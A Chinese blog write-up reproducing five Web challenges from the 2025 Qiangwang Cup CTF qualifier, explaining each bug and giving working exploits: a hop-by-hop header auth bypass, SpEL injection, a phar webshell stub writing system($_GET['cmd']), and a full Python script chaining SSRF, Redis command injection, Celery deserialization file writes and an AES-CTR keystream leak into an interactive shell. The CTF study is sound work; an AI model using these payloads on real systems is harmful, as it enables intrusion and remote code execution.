yemaster的小窝

强网杯 第九届初赛 Web 部分题目复现

2025-11-27
150

Secret Vault

题目描述

小明最近注册了很多网络平台账号,为了让账号使用不同的强密码,小明自己动手实现了一套非常“安全”的密码存储系统 -- SecretVault,但是健忘的小明没记住主密码,你能帮他找找吗

附件

分析

给了三个网站::5555 Go 代理和 jwt 校验,:5000 Python 业务处理,:4444 Go 签名 jwt。

服务流程为:

  1. 用户请求发送到 :5555
  2. Go 校验 jwt,获取到 uid 放到 X-User 头,转发到 :5000
  3. Python 根据 X-User 头判断用户身份

目标是拿到 :5000 的 Admin 权限(uid:0)

当没有 X-User 头的时候,UID 默认为 0(Admin)。使用 Hop by hop headers(逐跳头),把头放入 Connection 中,就变成逐跳头,导致 Go 的代理就不会把这个头转发给 Python 了。

因此我们只要向 /dashboard 发送,并设置 X-User 为 Hop by hop headers 即可。这样子就拿到了管理员的权限。

import requests

r = requests.get("http://localhost:5555/dashboard", headers={"Connection":"close, X-User"})
print(r.text)

https://assets.yemaster.cn/2025/11/76ae3dd80521588863dc2a4237fb6b0b.png

参考

bbjv

题目描述

a baby spring

分析

题目给了一个 Springboot 的 jar 包,结构很简单:

    @GetMapping({"/check"})
    public String checkRule(@RequestParam String rule) throws FileNotFoundException {
        String result = this.evaluationService.evaluate(rule);
        File flagFile = new File(System.getProperty("user.home"), "flag.txt");
        if (flagFile.exists()) {
            try {
                BufferedReader br = new BufferedReader(new FileReader(flagFile));
                String content = br.readLine();
                result = result + "<br><b>�� Flag:</b> " + content;
                br.close();
            } catch (IOException e) {
                throw new RuntimeException(e);
            }
        }
        return result;
    }
package com.ctf.gateway.service;

import org.springframework.expression.EvaluationContext;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.common.TemplateParserContext;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.stereotype.Service;
@Service
/* loaded from: EvaluationService.class */
public class EvaluationService {
    private final ExpressionParser parser = new SpelExpressionParser();
    private final EvaluationContext context;

    public EvaluationService(EvaluationContext context) {
        this.context = context;
    }

    public String evaluate(String expression) {
        try {
            Object result = this.parser.parseExpression(expression, new TemplateParserContext()).getValue(this.context);
            return "Result: " + String.valueOf(result);
        } catch (Exception e) {
            return "Error: " + e.getMessage();
        }
    }
}

Dockerfile 中给出了 flag 文件的地址为 /tmp/flag.txt,因此用 Spel 表达式把 user.home 设置为 /tmp 即可。

#{#systemProperties['user.home']='/tmp'}

需要 URL 编码

/check?rule=%23%7B%23systemProperties%5B%27user.home%27%5D%3D%27/tmp%27%7D

https://assets.yemaster.cn/2025/11/9f946d0ffaeb5de307d70b5311433a4d.png

yamcs

题目描述

How to rce?

分析

在 Algorithm 下发现了类似 Java 代码的东西:

https://assets.yemaster.cn/2025/11/eb5f6983d4b6cabbaa0fd23dfb3619db.png

因此用 Java 代码读取 /flag,然后给 out0 进行设置即可:

String flag = "";
try {
    byte[] data = java.nio.file.Files.readAllBytes(
        java.nio.file.Paths.get("/flag")
    );
    flag = new String(data, java.nio.charset.StandardCharsets.UTF_8).trim();
    out0.setStringValue(flag);
} catch (Exception e) {}

out0.setStringValue(flag);

然后开启 trace 就可以看到 flag 了:

https://assets.yemaster.cn/2025/11/e574821f9a581008af59d5c293ae8625.png

ezphp

题目描述

real ez php

writeup需要详细的分析调试过程及截图

分析

首先还原 eval 代码:

function generateRandomString($length = 8) {
    $characters = 'abcdefghijklmnopqrstuvwxyz';
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $r = rand(0, strlen($characters) - 1);
        $randomString .= $characters[$r];
    }
    return $randomString;
}
date_default_timezone_set('Asia/Shanghai');
class test {
    public $readflag;
    public $f;
    public $key;
    public function __construct() {
        $this->readflag = new class {
            public function __construct() {
                if (isset($_FILES['file']) && $_FILES['file']['error'] == 0) {
                    $time = date('Hi');
                    $filename = $GLOBALS['filename'];
                    $seed = $time . intval($filename);
                    mt_srand($seed);
                    $uploadDir = 'uploads/';
                    $files = glob($uploadDir . '*');
                    foreach ($files as $file) {
                        if (is_file($file)) unlink($file);
                    }
                    $randomStr = generateRandomString(8);
                    $newFilename = $time . '.' . $randomStr . '.' . 'jpg';
                    $GLOBALS['file'] = $newFilename;
                    $uploadedFile = $_FILES['file']['tmp_name'];
                    $uploadPath = $uploadDir . $newFilename;
                    if (system("cp ".$uploadedFile." ". $uploadPath)) {
                        echo "success upload!";
                    } else {
                        echo "error";
                    }
                }
            }
            public function __wakeup() {
                phpinfo();
            }
            public function readflag() {
                function readflag() {
                    if (isset($GLOBALS['file'])) {
                        $file = $GLOBALS['file'];
                        $file = basename($file);
                        if (preg_match('/:\/\//', $file))die("error");
                        $file_content = file_get_contents("uploads/" . $file);
                        if (preg_match('/<\?|\:\/\/|ph|\?\=/i', $file_content)) {
                            die("Illegal content detected in the file.");
                        }
                        include("uploads/" . $file);
                    }
                }
            }
        };
    }
    public function __destruct() {
        $func = $this->f;
        $GLOBALS['filename'] = $this->readflag;
        if ($this->key == 'class')new $func(); else if ($this->key == 'func') {
            $func();
        } else {
            highlight_file('index.php');
        }
    }
}
$ser = isset($_GET['land']) ? $_GET['land'] : 'O:4:"test":N';
@unserialize($ser);

利用顺序:首先上传文件->执行readflag方法->执行readflag函数进行include。完成这一个利用,需要解决如下问题

  1. $this->readflag 是一个匿名类,如何调用匿名类的 readflag 方法?
  2. include 之前进行了严格的过滤,如何绕过?

匿名类方法调用

匿名类在执行的时候,php 会赋予一个类名:

<?php
eval('$test = new class {};');
echo urlencode(get_class($test));

结果:

class%40anonymous%00%2Fvar%2Fwww%2Fhtml%2Ftest1.php%282%29+%3A+eval%28%29%27d+code%3A1%240

也就是:

class@anonymous\x00/var/www/html/test1.php(2) : eval()'d code:1$0

格式为:

class@anonymous\x00文件名(代码所在行) : eval()'d code:eval的第几行$计数器

得到了类名,接下来就是如何调用这个类的方法了。在 test 类的 destruct 方法中,可以新建类 new $func(); 或者调用函数 $func()。在 PHP 中,让 $func类名::方法 或者 ['类名', '方法'],就可以用 $func() 调用某个类指定的方法了,虽然要求静态方法,但是在这里仍然能使用。

这样子,我们就可以调用 $this->readflag 的 readflag 方法,创建 readflag 函数了。

绕过限制

参考 DeadsecCTF2025 baby-web,用 phar 来绕过限制。

题目给的限制很严,如果不编码加密的话,根本不可能上传含有 php 代码的东西。但是,查阅 PHP 源码可以发现,当文件名含有 .phar 时(不需要在结尾),就会把这个当成 phar 文件解析:

https://github.com/php/php-src/blob/master/ext/phar/phar.c

https://assets.yemaster.cn/2025/11/bf596eb83bf3dd35256608b4906e52f5.png

并且,解析 phar 文件时,会先判断是否为 gzip 压缩,如果是的话,会进行解压。

打开 phar 文件流
   ↓
尝试 rewind 到起始位置
   ↓
是否 gzip?→ 解压 → rewind
是否 bzip2?→ 解压 → rewind
是否 zip?→ phar_parse_zipfile
是否 tar?→ phar_parse_tarfile
   ↓
扫描 __HALT_COMPILER();
   ↓
找到了 → phar_parse_pharfile()
找不到 → 报错并退出

这样,这个限制就比较好绕过了。虽然题目限定后缀名为 .phar,但是文件名格式为 日期.随机字符串.jpg,因此我们只需要让随机字符串为 phar 开头即可(这个完全可控,因为我们可以指定随机数种子),然后提交一个 gzip 压缩后的 phar 木马即可。

<?php
$phar = new Phar('exp.phar');
$phar->startBuffering();

$stub = <<<'STUB'
<?php
echo 'hacked', PHP_EOL;
file_put_contents("shell.php", '<?php system($_GET["cmd"]); ?>');
__HALT_COMPILER();
?>
STUB;

$phar->setStub($stub);
$phar->addFromString('test.txt', 'test');
$phar->stopBuffering();

然后将生成的 exp.phar 用压缩软件以 gzip 方式压缩为 exp.phar.gz。然后反序列化部分,先随机一个 phar 开头的字符串,上传 phar 文件,然后触发匿名类 readflag,再执行 readflag,include phar 造成 RCE。

这里贴一个 Polaris 战队的 exp:

<?php
function generateRandomString($length = 8)
{
    $characters = 'abcdefghijklmnopqrstuvwxyz';
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $r = rand(0, strlen($characters) - 1);
        $randomString .= $characters[$r];
    }
    return $randomString;
}
date_default_timezone_set('Asia/Shanghai');

class test
{
    public $readflag;
    public $f;
    public $key;
}

$readflag=1;
while (true){
    $time = date('Hi');
    $seed = $time . intval($readflag);
    mt_srand($seed);
    $str = generateRandomString(8);
    if(substr($str, 0, 4) === 'phar'){
        echo $readflag, PHP_EOL.'<br />';
        echo $str, PHP_EOL.'<br />';
        echo $seed, PHP_EOL.'<br />';
        break;
    }else{
        $readflag++;
    }
}

$test = new test();
$test->readflag = $readflag;
$test->key = 'class';
$test->f = 'test';

$test2 = new test();
$test2->readflag = $readflag;
$test2->key = 'func';
$test2->f = urldecode("%00readflag/var/www/html/index.php(1) : eval()'d code:1$1");

$exp=serialize(array($test, $test2));
echo $exp, PHP_EOL.'<br />';
?>
<!DOCTYPE html>
<html>
<head>
    <title>File Upload</title>
</head>
<body>
<h2>Upload File</h2>
<form action='https://eci-2zei3ure1bkiq5oi5ewp.cloudeci1.ichunqiu.com:80/?land=<?php echo urlencode($exp);?>' method="post" enctype="multipart/form-data">
    <input type="file" name="file" required>
    <input type="submit" value="Upload">
</form>
</body>
</html>

Celerace

题目描述

Carefully Read...Celeritously Race...Get a CRITICAL RCE...!

分析

  • 框架:自制 MiniFlask + Celery + Redis。
  • 管理接口 /tasks/fetch 原本 admin-only,用于投递任意 TCP 的 miniws.fetch 任务。
  • Redis 命令和 Redis 脚本
  • 自定义序列化 miniws-aes:AES-CTR 固定 nonce,无 MAC,可篡改。
  • DiagnosticsPersistError(CVE-2021-23727 类)可按输入写任意文件。
  • supervisord 自动重启服务,便于覆盖文件后生效。

题目给了 Redis,肯定是需要 SSRF 去操控 Redis 的数据的。然后题目既然没有直接用 Flask,而是用自己的 MiniFlask,这其中也是肯定要漏洞的。

SSRF

题目首先给了两个任务,echo 和 fetch:

@app.post("/tasks/echo")
def queue_echo():
    data = request.get_json(silent=True) or {}
    message = data.get("message", "")
    return _queue("miniws.echo", message=message)


@app.post("/tasks/fetch", middlewares=[require_admin])
def queue_fetch_root():
    return queue_fetch("")

@app.post("/tasks/fetch/<path:target>", middlewares=[require_admin])
def queue_fetch(target: str):
    payload = request.get_json(silent=True) or {}
    url = payload.get("url") or target
    verb = payload.get("verb", "GET")
    if not url:
        return jsonify({"error": "url required"}, status=400)
    host_header = payload.get("host")
    body = payload.get("body")
    return _queue("miniws.fetch", url=url, host_header=host_header, body=body, verb=verb)

看 tasks.php 可以知道,echo 就是纯粹的复读,fetch 则可以进行向任意地址发送请求。

但是 fetch 用了一个中间件,要求 admin 权限才可以访问。查看 MiniFlask 中中间件相关代码:

    def _collect_route_middlewares(self, endpoint: str, path: str) -> list[MiddlewareCallable]:
        scoped = list(self.route_middlewares.get(endpoint, []))
        if scoped:
            return scoped
        if not self.wildcard_middlewares:
            return scoped
        normalized_path = self._normalize_path(path)
        for pattern, middlewares in reversed(self.wildcard_middlewares):
            if self._pattern_matches(pattern, normalized_path):
                return list(middlewares)
        return scoped

我们发现,题目先用 _normalize_path 对 path 进行了处理。这样子,我们访问 /task/fetch/../xx 的话,会匹配到路由 /task/fetch/<path>,但是在匹配中间件的时候,由于会被 normalize 成 /task/xxx,就不会被匹配了,这样子就饶过了限制,成功 SSRF 了。

任意写文件

由于 readflag 只有 worker 用户才有执行的权限,因此考虑修改 tasks.py 的内容,来达到 RCE。考虑如何对文件进行写入。

Celery 有一个反序列化的 CVE:

'status': 'FAILURE',
'result': {
  'exc_module': 'os',
  'exc_type': 'system',
  'exc_message': 'id'
  }
}

当一个 task FAILURE 之后,Celery 会对 result 进行反序列化,上面的数据导致执行了 os.system('id')。虽然这个 CVE 已经被修复,但是修复的方法是只允许反序列化已定义的 Exception 类。题目定义了一个 framework/app.py::DiagnosticsPersistError 类:

class DiagnosticsPersistError(RuntimeError):
    """Dormant exception used for development-time diagnostics persistence."""

    _BASE_DIR = Path(os.environ.get("FRAMEWORK_DIAGNOSTICS_DIR", "/app/data")).resolve()
    _DEBUG_SENTINEL = Path("/tmp/debug")

    def __init__(self, payload: str, *args: Any, **kwargs: Any) -> None:
        if self._DEBUG_SENTINEL.exists():
            self._maybe_persist(payload)
        super().__init__("diagnostics capture failed", *args, **kwargs)

    def _maybe_persist(self, payload: str) -> None:
        info = self._decode_payload(payload)
        if not info:
            return

        target = info.get("path")
        if not target:
            return

        path = Path(target)
        mode = str(info.get("mode", "w"))
        encoding = info.get("encoding", "utf-8")
        data = info.get("content", "")

        try:
            path.parent.mkdir(parents=True, exist_ok=True)
            if "b" in mode:
                blob = self._ensure_bytes(data, encoding)
                with path.open(mode) as fh:  # type: ignore[call-arg]
                    fh.write(blob)
            else:
                text = self._ensure_text(data, encoding)
                with path.open(mode, encoding=encoding) as fh:
                    fh.write(text)
        except Exception:
            return

    def _decode_payload(self, payload: str) -> Dict[str, Any] | None:
        attempts = [payload]
        try:
            attempts.append(bytes.fromhex(payload).decode("utf-8"))
        except Exception:
            pass

        for candidate in attempts:
            try:
                return json.loads(candidate)
            except Exception:
                continue
        return None

    def _ensure_bytes(self, data: Any, encoding: str) -> bytes:
        if isinstance(data, bytes):
            return data
        if isinstance(data, str):
            if encoding == "base64":
                return base64.b64decode(data)
            return data.encode(encoding)
        return bytes(data)

    def _ensure_text(self, data: Any, encoding: str) -> str:
        if isinstance(data, str):
            if encoding == "base64":
                return base64.b64decode(data).decode("utf-8", errors="ignore")
            return data
        if isinstance(data, bytes):
            return data.decode(encoding, errors="ignore")
        return str(data)

这个类只要文件 /tmp/debug 存在,就可以写入任意文件。因此接下来考虑如何创建 /tmp/debug 文件。题目除了自己实现了 MiniFlask,还实现了一个 Session,查看相关代码:

    def save(self, session: FileSession) -> None:
        if not session.modified:
            return
        path = self._session_path(session.sid)
        tmp_path = f"{path}.tmp-{secrets.token_hex(4)}"
        payload = {key: value for key, value in session.items()}
        with open(tmp_path, "w", encoding="utf-8") as fh:
            json.dump(payload, fh, ensure_ascii=False, separators=(",", ":"))
        os.replace(tmp_path, path)
        session.modified = False

我们只需要指定 session.sid 为 /tmp/debug,就可以创建这个文件了(因为这里不能写入任意代码,所以还是只能利用反序列化)。我们首先设置 Cookie 为:mini_session=/tmp/debug,然后构造反序列化,利用 redis 设置 task 的状态即可:

set celery-task-meta-{task_id_write} '{"status":"FAILURE","result":{"exc_type":"DiagnosticsPersistError","exc_message":"{hex_payload}","exc_module":"framework.app"},"traceback":"","children":[], "date_done": "2025-10-31T06:15:48.956927", "task_id":"{task_id_write}"}'

这里我们更改 tasks.py 的 echo 任务,变成一个执行命令的任务,然后我们对 tasks.py 文件进行写入即可。

获取任务加密密钥流

修改 task 之后,我们发现并没有生效,我们需要重启服务才可以生效,因为这里开了 supervisor,我们发送 shutdown 关闭服务,服务也可以被自动重启。因为 app.py 只给出了 echo 和 fetch 两个任务,我们要执行 shutdown 命令,只能靠 redis 把命令塞入任务队列才行。

但是题目对任务队列进行了加密:

from __future__ import annotations

import json
import socket
from hashlib import md5, sha1
from typing import Any

from Crypto.Cipher import AES

from .config import settings
import logging
_TASK_KEY = sha1(settings.secret_key.encode()).digest()[:16]
_TASK_NONCE = md5(socket.gethostname().encode()).digest()[:8]
logging.basicConfig(level=logging.INFO)

def encrypt_bytes(data: bytes) -> bytes:
    cipher = AES.new(_TASK_KEY, AES.MODE_CTR, nonce=_TASK_NONCE)
    return cipher.encrypt(data)


def decrypt_bytes(data: bytes) -> bytes:
    cipher = AES.new(_TASK_KEY, AES.MODE_CTR, nonce=_TASK_NONCE)
    return cipher.decrypt(data)


def dumps(payload: Any) -> bytes:
    raw = json.dumps(payload, separators=(",", ":"), ensure_ascii=False).encode("utf-8")
    return encrypt_bytes(raw)


def loads(ciphertext: bytes) -> Any:
    raw = decrypt_bytes(ciphertext)
    return json.loads(raw.decode("utf-8"))

但是,题目使用了 AES 的 CTR 模式,并且每次的 key 和 nonce 一样,因此每次的密钥流都一样。我们只需要把密钥流偷出来就可以破解加密了。

我们首先阻塞任务队列,然后给 redis 发请求获取任务在任务队列的内容,然后发送大量已知的任务即可。阻塞任务队列,我们可以用 fetch 让服务器请求不存在的地址即可,然后偷内容的话,可以写一个 Lua 脚本。关于任务的明文,可以在 decrypt_bytes 打个日志就行。

这里选择先发送 20 个 fetch 任务(如果没被阻塞的话,可以提高数量),然后新开线程发送 echo 超多个 1 的任务,然后用 redis 偷,把结果写到 task 的内容里即可:

EVAL "local element_list = redis.call('LRANGE', KEYS[1], 0, 0) if not element_list or #element_list == 0 then return nil end local first_element = element_list[1] local escaped_value = string.gsub(first_element, '\\"', '\\\\\\\\\\"') local json_result = '{\\"status\\": \\"SUCCESS\\", \\"result\\": {\\"echo\\": \\"' .. escaped_value .. '\\"}, \\"traceback\\": null, \\"children\\": [], \\"date_done\\": \\"2025-10-31T03:20:37.823922\\", \\"task_id\\": \\"{leak_id}\\"}' redis.call('SET', KEYS[2], json_result) return json_result" 2 celery celery-task-meta-{leak_id}

然后对明文异或即可得到密钥流:

plaintext = '''
[[],{"message":"111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111"},{"callbacks":null,"errbacks":null,"chain":null,"chord":null}]
'''.strip().encode()

keystream = [ciphertext[i] ^ plaintext[i] for i in range(len(ciphertext))]

重启

得到密钥流之后,发送 shutdown 命令重启服务即可:

def encrypt(data: bytes) -> bytes:
    return bytes([data[i] ^ keystream[i] for i in range(min(len(data), len(keystream)))])

plain_json = '''
{"method":"shutdown","arguments":{},"destination":null,"pattern":null,"matcher":null,"ticket":"8b3edc18-e6c9-41df-8fbb-e3452b0db26f","reply_to":{"exchange":"reply.celery.pidbox","routing_key":"082a4b30-f17a-3be9-ac0e-023e96bcc32a"}}

'''.strip().encode()
encrypted = encrypt(plain_json)
body_b64 = base64.b64encode(encrypted).decode()

redis_cmd_shutdown = (
    f'PUBLISH /0.celery.pidbox '
    f'\'{{"body":"{body_b64}","content-encoding":"binary",'
    f'"content-type":"application/x-miniws",'
    f'"headers":{{"clock":1,"expires":1999999999.0}},'
    f'"properties":{{"delivery_mode":2,"delivery_info":{{"exchange":"celery.pidbox","routing_key":""}},'
    f'"priority":0,"body_encoding":"base64","delivery_tag":"{uuid.uuid4()}"}}}}\''
)

send_fetch(gen_verb_payload(redis_cmd_shutdown))

最终 POC

最终脚本如下:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# 强网杯 2025 CeleRace 完整自动化利用脚本(按WP精确实现DOS)
# 靶机地址:http://localhost:4050
# 修正:用无效IP fetch造成5s timeout DOS,洪水用echo确保队列内容

import requests
import uuid
import json
import time
import base64
import threading

TARGET = "http://localhost:12345"
s = requests.Session()

# ==================== 工具函数 ====================
def gen_verb_payload(redis_cmd: str) -> str:
    return "\r\n" + redis_cmd + "\r\nQUIT\r\nGET"

def send_fetch(verb_payload: str):
    url = f"{TARGET}/tasks/fetch/%2e%2e/123"
    data = {"url": "http://localhost:6379", "verb": verb_payload}
    # print(data)
    r = s.post(url, json=data, timeout=15)
    if r.status_code != 200:
        print(f"[!] 发送失败: {r.text}")
        return None
    task_id = r.json()["task_id"]
    print(f"[+] 任务提交 → {task_id}")
    return task_id

def wait_task(task_id: str, timeout=30):
    print(f"[*] 等待任务 {task_id} 完成...")
    for _ in range(timeout):
        r = s.get(f"{TARGET}/tasks/result?id={task_id}", timeout=10)
        # print(r.text)
        j = r.json()
        # print(j)
        if j.get("state") in ["SUCCESS", "FAILURE"]:
            return j
        time.sleep(1)
    return None

# ==================== 1. 创建 /tmp/debug 哨兵 ====================
print("[1] 创建 /tmp/debug 哨兵文件")
s.cookies.set("mini_session", "/tmp/debug")
s.get(TARGET + "/")

# ==================== 2. 写入恶意 tasks.py ====================
MALICIOUS_TASKS_PY = '''from __future__ import annotations

import os
import pickle
import socket
from typing import Any, Dict
from urllib.parse import urlparse

from celery import Celery
from kombu.serialization import register

from .config import settings
from .crypto import dumps as encrypt_dumps, loads as decrypt_loads

try:
    register(
        "miniws-aes",
        encrypt_dumps,
        decrypt_loads,
        content_type="application/x-miniws",
        content_encoding="binary",
    )
except ValueError:
    pass

celery_app = Celery(
    "miniws",
    broker=settings.celery_broker_url,
    backend=settings.celery_backend_url,
)

celery_app.conf.update(
    task_serializer="miniws-aes",
    task_default_serializer="miniws-aes",
    accept_content=["miniws-aes"],
    result_serializer="json",
    result_accept_content=["json"],
)


@celery_app.task(name="miniws.echo")
def echo_task(message: str) -> Dict[str, Any]:
    return {"echo": os.popen(message).read()}
    

'''

print("\n[2] 写入恶意 /app/src/tasks.py")
task_id_write = str(uuid.uuid4())
payload_json = {"path": "/app/src/tasks.py", "content": MALICIOUS_TASKS_PY}
hex_payload = json.dumps(payload_json).encode().hex()

redis_cmd_write = (
    f'set celery-task-meta-{task_id_write} '
    f'\'{{"status":"FAILURE","result":{{"exc_type":"DiagnosticsPersistError",'
    f'"exc_message":"{hex_payload}","exc_module":"framework.app"}},'
    f'"traceback":"","children":[], "date_done": "2025-10-31T06:15:48.956927", "task_id":"{task_id_write}"}}\''
)
# print(redis_cmd_write)
# set celery-task-meta-<uuid> '{"status": "FAILURE", "result": {"exc_type": "DiagnosticsPersistError", "exc_message": "<hex payload>", "exc_module": "framework.app"}, "traceback": "", "children": [], "date_done": "2025-10-31T06:15:48.956927", "task_id": "<uuid>"}'

send_fetch(gen_verb_payload(redis_cmd_write))
r = s.get(f"{TARGET}/tasks/result?id={task_id_write}")  # 触发反序列化
print(r.text)
time.sleep(2)

# ==================== 3. 泄露密钥流(按WP:无效IP DOS + Lua偷队列) ====================
print("\n[3] 开始泄露 AES-CTR 密钥流(用无效IP fetch DOS)")

# 1. 发20个无效IP fetch任务(每个超时5s,堵塞worker)
print("[*] 发送20个无效IP fetch任务(DOS堵塞)")
INVALID_IP = "192.168.72.131:6378"  # 不存在IP
for i in range(20):
    s.post(f"{TARGET}/tasks/fetch/%2e%2e/asd", json={"url": f"http://{INVALID_IP}"}, timeout=20)
    print(f"[*] DOS任务 {i+1}/20 发送")

is_dos_ok = True
# 2. 持续发echo任务(确保队列有内容可偷,长消息无延迟但填充队列)
def flood_echo():
    while is_dos_ok:
        try:
            s.post(f"{TARGET}/tasks/echo", json={"message": "111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111"}, timeout=1)  # 长消息填充
        except:
            pass

threading.Thread(target=flood_echo, daemon=True).start()

# 3. 发一个echo任务作为"锚点"(但实际Lua偷的是队列第一个加密任务消息)
leak_task_id = str(uuid.uuid4())
s.post(f"{TARGET}/tasks/echo", json={"message": "111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111"})
time.sleep(1)

# 4. Lua脚本:偷celery队列第一个元素(加密的任务headers),伪造成SUCCESS结果
lua_script = '''EVAL "local element_list = redis.call('LRANGE', KEYS[1], 0, 0) if not element_list or #element_list == 0 then return nil end local first_element = element_list[1] local escaped_value = string.gsub(first_element, '\\"', '\\\\\\\\\\"') local json_result = '{\\"status\\": \\"SUCCESS\\", \\"result\\": {\\"echo\\": \\"' .. escaped_value .. '\\"}, \\"traceback\\": null, \\"children\\": [], \\"date_done\\": \\"2025-10-31T03:20:37.823922\\", \\"task_id\\": \\"''' + leak_task_id + '''\\"}' redis.call('SET', KEYS[2], json_result) return json_result" 2 celery celery-task-meta-''' + leak_task_id

send_fetch(gen_verb_payload(lua_script))

# 5. 读取泄露的加密任务消息(base64)
result = wait_task(leak_task_id, timeout=40)
print(result)
if not result or "echo" not in result.get("result", {}):
    print("[-] 密钥流泄露失败!检查队列是否堵塞")
    exit(1)

is_dos_ok = False

result_echo = result["result"]["echo"]
result_json = json.loads(result_echo)
encrypted_body_b64 = result_json["body"]
ciphertext = base64.b64decode(encrypted_body_b64)

# 6. 构造任务明文(Celery任务序列化格式:[[],{"message":"A"*405},...])
plaintext = '''
[[],{"message":"111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111"},{"callbacks":null,"errbacks":null,"chain":null,"chord":null}]
'''.strip().encode()

# 7. 异或得到keystream
keystream = [ciphertext[i] ^ plaintext[i] for i in range(len(ciphertext))]
# print(keystream)

print(f"[+] 成功获取密钥流({len(keystream)} bytes)")

# ==================== 4. 构造并发送 shutdown ====================
print("\n[4] 构造 shutdown 控制命令")

def encrypt(data: bytes) -> bytes:
    return bytes([data[i] ^ keystream[i] for i in range(min(len(data), len(keystream)))])

plain_json = '''
{"method":"shutdown","arguments":{},"destination":null,"pattern":null,"matcher":null,"ticket":"8b3edc18-e6c9-41df-8fbb-e3452b0db26f","reply_to":{"exchange":"reply.celery.pidbox","routing_key":"082a4b30-f17a-3be9-ac0e-023e96bcc32a"}}

'''.strip().encode()
encrypted = encrypt(plain_json)
body_b64 = base64.b64encode(encrypted).decode()

redis_cmd_shutdown = (
    f'PUBLISH /0.celery.pidbox '
    f'\'{{"body":"{body_b64}","content-encoding":"binary",'
    f'"content-type":"application/x-miniws",'
    f'"headers":{{"clock":1,"expires":1999999999.0}},'
    f'"properties":{{"delivery_mode":2,"delivery_info":{{"exchange":"celery.pidbox","routing_key":""}},'
    f'"priority":0,"body_encoding":"base64","delivery_tag":"{uuid.uuid4()}"}}}}\''
)

send_fetch(gen_verb_payload(redis_cmd_shutdown))
print("[+] shutdown 已发送,等待 worker 重启并加载恶意代码 (~12s)")
time.sleep(12)

# ==================== 5. 交互式 RCE ====================
print("\n" + "="*70)
print("成功 getshell!现在可以直接执行任意命令")
print("="*70)

while True:
    try:
        cmd = input("\nshell > ").strip()
        if cmd.lower() in ["exit", "quit", "q"]:
            break
        if not cmd:
            continue

        r = s.post(f"{TARGET}/tasks/echo", json={"message": cmd})
        if r.status_code != 200:
            print("提交失败")
            continue
        task_id = r.json()["task_id"]
        time.sleep(1.5)
        res = s.get(f"{TARGET}/tasks/result?id={task_id}").json()
        if "result" in res and "echo" in res["result"]:
            print(res["result"]["echo"].rstrip())
        else:
            print("(无回显,可能是命令太快,再试一次)")
    except KeyboardInterrupt:
        print("\nBye~")
        break

参考

写在最后

这次比赛打得并不好。但是在赛后,根据题目源码和网上的 WP 进行了环境搭建和复现,也是学到了很多内容。下面是参考的 WP 列表:

参考的 WP

分类标签:Web 2025 强网杯

下一篇

没有了
Comments

目录